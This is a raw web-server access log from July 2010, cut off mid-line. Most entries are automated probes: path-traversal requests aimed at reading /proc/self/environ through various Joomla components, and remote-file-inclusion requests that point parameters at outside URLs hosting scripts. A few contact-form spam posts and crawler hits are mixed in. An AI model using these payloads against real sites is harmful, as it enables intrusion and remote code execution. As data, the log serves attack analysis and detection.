174.121.9.99 - - [01/Jul/2010:12:46:05 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [01/Jul/2010:12:47:03 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.142.75.115 - - [01/Jul/2010:12:47:03 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.142.75.115 - - [01/Jul/2010:12:47:03 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:50 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:50 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:50 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:50 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:47:51 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
207.46.199.201 - - [01/Jul/2010:12:49:24 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.121.9.99 - - [01/Jul/2010:12:51:19 -0500] "GET /logs/access_log.1275696000/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:51:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.121.9.99 - - [01/Jul/2010:12:51:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
208.92.234.103 - - [01/Jul/2010:12:57:15 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
208.92.234.103 - - [01/Jul/2010:12:57:20 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
208.92.234.103 - - [01/Jul/2010:12:57:21 -0500] "GET /logs/access_log.1266710400//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.204.196 - - [01/Jul/2010:13:02:08 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.92.234.103 - - [01/Jul/2010:13:02:32 -0500] "GET /logs/access_log.1274572800//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://bcis.pacificu.edu/images/1???? HTTP/1.1" 404 345 "-""Mozilla/5.0"
207.46.204.196 - - [01/Jul/2010:13:02:46 -0500] "GET /artwork/dioramas.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.131.96.193 - - [01/Jul/2010:13:10:29 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:11:36 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:11:48 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:11:48 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:11:49 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
125.141.91.138 - - [01/Jul/2010:13:23:49 -0500] "GET /logs/access_log.1276214400/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:49 -0500] "GET /errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:50 -0500] "GET /logs/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:55 -0500] "GET /logs/access_log.1276214400/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:55 -0500] "GET /errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:56 -0500] "GET /logs/access_log.1276214400/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:56 -0500] "GET /logs/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:56 -0500] "GET /errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:57 -0500] "GET /logs/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:23:59 -0500] "GET /logs/access_log.1276214400/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:24:00 -0500] "GET /errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:24:00 -0500] "GET /logs/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:25:26 -0500] "GET /logs/access_log.1276041600/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:25:26 -0500] "GET /logs/access_log.1276041600/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:25:27 -0500] "GET /logs/access_log.1276041600/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
125.141.91.138 - - [01/Jul/2010:13:25:27 -0500] "GET /logs/access_log.1276041600/errors.php?error=http://tdos.org/images/log.png??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
114.200.199.236 - - [01/Jul/2010:13:25:53 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
216.131.96.193 - - [01/Jul/2010:13:28:36 -0500] "GET /logs/access_log.1277424000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:36 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:36 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:45 -0500] "GET /logs/access_log.1277424000//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:45 -0500] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:45 -0500] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:47 -0500] "GET /logs/access_log.1276214400//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
216.131.96.193 - - [01/Jul/2010:13:28:54 -0500] "GET /logs/access_log.1276214400//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.831"
67.195.112.180 - - [01/Jul/2010:13:33:03 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [01/Jul/2010:13:33:03 -0500] "GET /logs/access_log.1190851200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.120.252.192 - - [01/Jul/2010:13:41:10 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:10 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:10 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:15 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:15 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:16 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:16 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:16 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
216.120.252.192 - - [01/Jul/2010:13:41:16 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:13:42:12 -0500] "GET /logs/access_log.1274832000/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:13:42:12 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:13:42:12 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:13:42:53 -0500] "GET /logs/access_log.1277164800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
89.152.109.1 - - [01/Jul/2010:13:44:28 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:13:44:28 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:13:44:29 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
64.151.192.11 - - [01/Jul/2010:13:50:20 -0500] "GET /logs/access_log.1276128000//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:50:21 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:50:21 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:50:46 -0500] "GET /logs/access_log.1276473600//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.179.32.13 - - [01/Jul/2010:13:52:12 -0500] "GET /logs/access_log.1277164800//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
213.179.32.13 - - [01/Jul/2010:13:52:12 -0500] "GET //index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.829"
213.179.32.13 - - [01/Jul/2010:13:52:12 -0500] "GET /logs//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.829"
213.179.32.13 - - [01/Jul/2010:13:52:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_redshop&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.829"
67.195.112.180 - - [01/Jul/2010:13:54:46 -0500] "GET /logs/access_log.1234569600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
64.151.192.11 - - [01/Jul/2010:13:54:46 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
221.144.12.141 - - [01/Jul/2010:13:56:00 -0500] "GET /index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
64.151.192.11 - - [01/Jul/2010:13:58:20 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:58:21 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:58:21 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.151.192.11 - - [01/Jul/2010:13:58:22 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
221.144.12.141 - - [01/Jul/2010:13:58:36 -0500] "GET /logs/access_log.1276300800/index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
221.144.12.141 - - [01/Jul/2010:13:58:37 -0500] "GET /index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
221.144.12.141 - - [01/Jul/2010:13:58:37 -0500] "GET /logs/index.php?option=com_horoscope&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
200.164.110.11 - - [01/Jul/2010:14:00:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
67.195.112.180 - - [01/Jul/2010:14:07:48 -0500] "GET /costume/cd-page1.htm HTTP/1.0" 200 1189 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /logs/access_log.1277164800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /logs/access_log.1277164800/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
69.73.155.53 - - [01/Jul/2010:14:08:19 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
89.152.109.1 - - [01/Jul/2010:14:10:26 -0500] "GET /logs/access_log.1274572800//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:10:26 -0500] "GET //index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:10:26 -0500] "GET /logs//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:10:29 -0500] "GET /logs/access_log.1277164800//index.php?option=com_wisroyq&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
194.201.253.2 - - [01/Jul/2010:14:11:03 -0500] "GET /logs/access_log.1277164800//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
194.201.253.2 - - [01/Jul/2010:14:11:04 -0500] "GET //index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
194.201.253.2 - - [01/Jul/2010:14:11:05 -0500] "GET /logs//index.php?option=com_appointment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
114.200.199.236 - - [01/Jul/2010:14:13:43 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.79"
121.254.172.27 - - [01/Jul/2010:14:17:41 -0500] "GET /logs/access_log.1266710400%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.254.172.27 - - [01/Jul/2010:14:17:41 -0500] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.254.172.27 - - [01/Jul/2010:14:17:41 -0500] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
89.152.109.1 - - [01/Jul/2010:14:17:46 -0500] "GET /logs/access_log.1276128000//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:17:46 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:17:47 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
89.152.109.1 - - [01/Jul/2010:14:18:09 -0500] "GET /logs/access_log.1276473600//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
68.232.180.132 - - [01/Jul/2010:14:19:24 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
68.232.180.132 - - [01/Jul/2010:14:19:24 -0500] "GET //index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
195.20.196.20 - - [01/Jul/2010:14:20:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:13 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:13 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:13 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:14 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:15 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:14:20:16 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
68.232.180.132 - - [01/Jul/2010:14:21:39 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
68.232.180.132 - - [01/Jul/2010:14:21:40 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
68.232.180.132 - - [01/Jul/2010:14:23:08 -0500] "GET /logs/access_log.1274572800/index.php?option=com_hsconfig&controller=../../../../../../../../../../../